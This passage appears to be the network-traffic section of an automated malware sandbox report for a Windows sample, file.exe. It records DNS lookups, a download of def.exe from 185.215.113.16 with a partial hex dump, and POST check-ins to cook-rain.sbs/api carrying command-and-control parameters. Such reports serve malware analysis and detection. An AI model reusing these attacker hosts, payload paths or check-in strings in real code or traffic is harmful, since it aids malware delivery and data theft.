                                                                                                                                                                              Nov 21, 2024 08:32:14.131812096 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.132111073 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.132134914 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.132143974 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.132333040 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.132371902 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.132431030 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.135200977 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.135248899 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.135637999 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.135807991 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.135833025 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.469326019 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.472409964 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.472558975 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.472558975 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.472558975 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.475327015 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.475374937 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.475454092 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.475610971 CET50054443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.475624084 CET4435005413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.556288958 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.556783915 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.556802988 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.557286024 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.557291031 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.777997017 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.778019905 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Nov 21, 2024 08:30:09.367357016 CET6104453192.168.2.61.1.1.1
                                                                                                                                                                              Nov 21, 2024 08:30:09.629401922 CET53610441.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.842345953 CET53582181.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.845937014 CET53653631.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:48.058984041 CET53549031.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:49.779334068 CET5175153192.168.2.61.1.1.1
                                                                                                                                                                              Nov 21, 2024 08:30:49.780401945 CET6113353192.168.2.61.1.1.1
                                                                                                                                                                              Nov 21, 2024 08:30:50.005261898 CET53517511.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:50.006010056 CET53611331.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.372859001 CET5659353192.168.2.61.1.1.1
                                                                                                                                                                              Nov 21, 2024 08:30:52.373316050 CET5421653192.168.2.61.1.1.1
                                                                                                                                                                              Nov 21, 2024 08:31:03.004960060 CET53618561.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.053750038 CET53640761.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:05.157299995 CET5479153192.168.2.61.1.1.1
                                                                                                                                                                              Nov 21, 2024 08:31:05.157510996 CET5666653192.168.2.61.1.1.1
                                                                                                                                                                              Nov 21, 2024 08:31:23.911981106 CET53648631.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:45.295536995 CET53550351.1.1.1192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:46.582750082 CET53576211.1.1.1192.168.2.6
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Nov 21, 2024 08:30:09.367357016 CET192.168.2.61.1.1.10x64a9Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:49.779334068 CET192.168.2.61.1.1.10xac48Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:49.780401945 CET192.168.2.61.1.1.10x98c4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.372859001 CET192.168.2.61.1.1.10x2886Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.373316050 CET192.168.2.61.1.1.10xffe6Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:31:05.157299995 CET192.168.2.61.1.1.10xd04dStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:31:05.157510996 CET192.168.2.61.1.1.10xe8efStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Nov 21, 2024 08:30:09.629401922 CET1.1.1.1192.168.2.60x64a9No error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:09.629401922 CET1.1.1.1192.168.2.60x64a9No error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:50.005261898 CET1.1.1.1192.168.2.60xac48No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:50.006010056 CET1.1.1.1192.168.2.60x98c4No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.603039980 CET1.1.1.1192.168.2.60xe580No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.603039980 CET1.1.1.1192.168.2.60xe580No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.603039980 CET1.1.1.1192.168.2.60xe580No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.603559971 CET1.1.1.1192.168.2.60xe8e1No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.604032040 CET1.1.1.1192.168.2.60x2886No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.604032040 CET1.1.1.1192.168.2.60x2886No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.604032040 CET1.1.1.1192.168.2.60x2886No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.604032040 CET1.1.1.1192.168.2.60x2886No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.605474949 CET1.1.1.1192.168.2.60xffe6No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:52.605474949 CET1.1.1.1192.168.2.60xffe6No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:55.391745090 CET1.1.1.1192.168.2.60xf57cNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:55.391745090 CET1.1.1.1192.168.2.60xf57cNo error (0)shed.dual-low.s-part-0014.t-0009.t-msedge.nets-part-0014.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:55.391745090 CET1.1.1.1192.168.2.60xf57cNo error (0)s-part-0014.t-0009.t-msedge.net13.107.246.42A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:30:55.391868114 CET1.1.1.1192.168.2.60x619dNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:31:05.383651972 CET1.1.1.1192.168.2.60xe8efNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 21, 2024 08:31:05.384913921 CET1.1.1.1192.168.2.60xd04dNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              • cook-rain.sbs
                                                                                                                                                                              • otelrules.azureedge.net
                                                                                                                                                                              • slscr.update.microsoft.com
                                                                                                                                                                              • https:
                                                                                                                                                                                • wcpstatic.microsoft.com
                                                                                                                                                                                • js.monitor.azure.com
                                                                                                                                                                              • fs.microsoft.com
                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.649762185.215.113.16803180C:\Users\user\Desktop\file.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Nov 21, 2024 08:30:33.079412937 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.457654953 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:34 GMT
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Content-Length: 2786816
                                                                                                                                                                              Last-Modified: Thu, 21 Nov 2024 07:17:32 GMT
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              ETag: "673ede8c-2a8600"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 b4 92 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+*`Ui` @ @.rsrc`2@.idata 8@haursnmf@*$*:@ppevldrg *^*@.taggant@+"d*@
                                                                                                                                                                              Nov 21, 2024 08:30:34.457731009 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              Nov 21, 2024 08:30:34.457865000 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              Nov 21, 2024 08:30:34.457973957 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              Nov 21, 2024 08:30:34.458030939 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              Nov 21, 2024 08:30:34.458045006 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              Nov 21, 2024 08:30:34.458081961 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              Nov 21, 2024 08:30:34.458118916 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              Nov 21, 2024 08:30:34.458154917 CET1236INData Raw: b7 8f e2 d2 5f a6 83 ae 6c 9a 1b 0f c9 7d 2a 32 12 2b 06 03 91 77 3d 40 1f a7 3e 5d 4a c6 20 79 69 bd 26 cb 73 7b ec 2f 23 10 ae 47 2e fc be db 12 7f 46 41 27 89 28 a5 3a c4 49 43 0d 84 4d f2 ad 1d 0a 77 ca a2 54 44 19 43 89 55 28 7b 79 7c 8a 8e
                                                                                                                                                                              Data Ascii: _l}*2+w=@>]J yi&s{/#G.FA'(:ICMwTDCU({y|QB.LGH^G&=~&>PKiGKS;NKg=VG%?BKm,4}L&FO3<{2c6fWp@V4sf>xsIkxD4VZs
                                                                                                                                                                              Nov 21, 2024 08:30:34.458194017 CET1236INData Raw: 5a b2 e0 55 f2 ea e4 77 f7 5e e5 2a 91 af 3c 2f 13 fc ec 34 ce 06 f5 64 41 9e fc 45 e5 ff 2a 35 33 a2 a3 b5 39 86 c7 a9 90 b2 11 4e 27 24 9d 61 6c 2d 12 5e 09 39 4d 66 69 b5 36 76 af 92 ac 4c ca 87 57 85 17 d5 ab 39 68 7e e1 7c 70 06 8f d0 78 0a
                                                                                                                                                                              Data Ascii: ZUw^*</4dAE*539N'$al-^9Mfi6vLW9h~|px L90/66V6Rb)<Y<5F:f>zDqGK[8MC|tDP(NQ)sIRn!~1C6)MU`H:E3h*8Z"Hv
                                                                                                                                                                              Nov 21, 2024 08:30:34.577958107 CET1236INData Raw: b8 97 30 9d 7e fd 8f a0 33 ac fc 75 71 b4 15 4e 79 3e a2 90 19 94 c0 6a a1 b1 56 ec 97 69 48 ef cb 94 da 41 31 94 4f 32 4c 67 5d 9b 72 92 33 67 d9 3c a5 9e 7e 0e 4a 61 8c d8 22 52 eb 53 be 2b ac 87 92 b7 7b bf f3 54 db e1 2a 7c bf c0 13 04 10 0f
                                                                                                                                                                              Data Ascii: 0~3uqNy>jViHA1O2Lg]r3g<~Ja"RS+{T*|IYl|VFX'zERD+$>6@8q <#r%C^6/q+mTatpT.6s,8[!.j$P$$&$h$-


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              0192.168.2.64970940.113.110.67443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:08 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6f 6a 77 39 41 49 38 42 43 55 32 69 73 73 31 4f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 38 38 33 33 30 33 30 30 65 36 65 38 61 61 33 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: ojw9AI8BCU2iss1O.1Context: 888330300e6e8aa3
                                                                                                                                                                              2024-11-21 07:30:08 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                              2024-11-21 07:30:08 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6f 6a 77 39 41 49 38 42 43 55 32 69 73 73 31 4f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 38 38 33 33 30 33 30 30 65 36 65 38 61 61 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69
                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ojw9AI8BCU2iss1O.2Context: 888330300e6e8aa3<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
                                                                                                                                                                              2024-11-21 07:30:08 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6f 6a 77 39 41 49 38 42 43 55 32 69 73 73 31 4f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 38 38 33 33 30 33 30 30 65 36 65 38 61 61 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: ojw9AI8BCU2iss1O.3Context: 888330300e6e8aa3<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                              2024-11-21 07:30:08 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                              2024-11-21 07:30:08 UTC58INData Raw: 4d 53 2d 43 56 3a 20 41 52 2b 66 71 61 7a 62 70 6b 79 55 63 62 74 41 4b 6a 74 75 39 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                              Data Ascii: MS-CV: AR+fqazbpkyUcbtAKjtu9g.0Payload parsing failed.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.649710188.114.96.34433180C:\Users\user\Desktop\file.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:10 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                              Host: cook-rain.sbs
                                                                                                                                                                              2024-11-21 07:30:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                              2024-11-21 07:30:11 UTC992INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:11 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=b4l72gv0nirmbqcmshd66nspsb; expires=Mon, 17-Mar-2025 01:16:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6w4iArptyMzN78ziIPC%2FlOoqIyNwFe%2BF%2Btc%2B3dSqZK3HTPP%2B91w7b%2FP4QasUMNEierKuvA95aryiD726pPT2auzb8ncb%2Biixj6t%2BsC%2F1Drlsb7ZmDCzvkqPNpJlsoKJN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8e5ef9139a7643b7-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1756919&cwnd=236&unsent_bytes=0&cid=7d113c6d700240d1&ts=710&x=0"
                                                                                                                                                                              2024-11-21 07:30:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                              2024-11-21 07:30:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.649711188.114.96.34433180C:\Users\user\Desktop\file.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:13 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 53
                                                                                                                                                                              Host: cook-rain.sbs
                                                                                                                                                                              2024-11-21 07:30:13 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                              2024-11-21 07:30:14 UTC977INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:14 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=k28lgq39ok0o1p5984865ta2ih; expires=Mon, 17-Mar-2025 01:16:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1skYkzALiVTmt8L2Zp7RYeCTPid2q0P9IymOsxwa6SYqIS8Axz4nXQL1VLJevecU6w8K3eY0dfN2m%2FBPm5ff7uX9aoC0Modj5BJJxLncyvh180uimKC8eWmWXrbVjGij"}],"group":"cf-nel","max_age":604800}
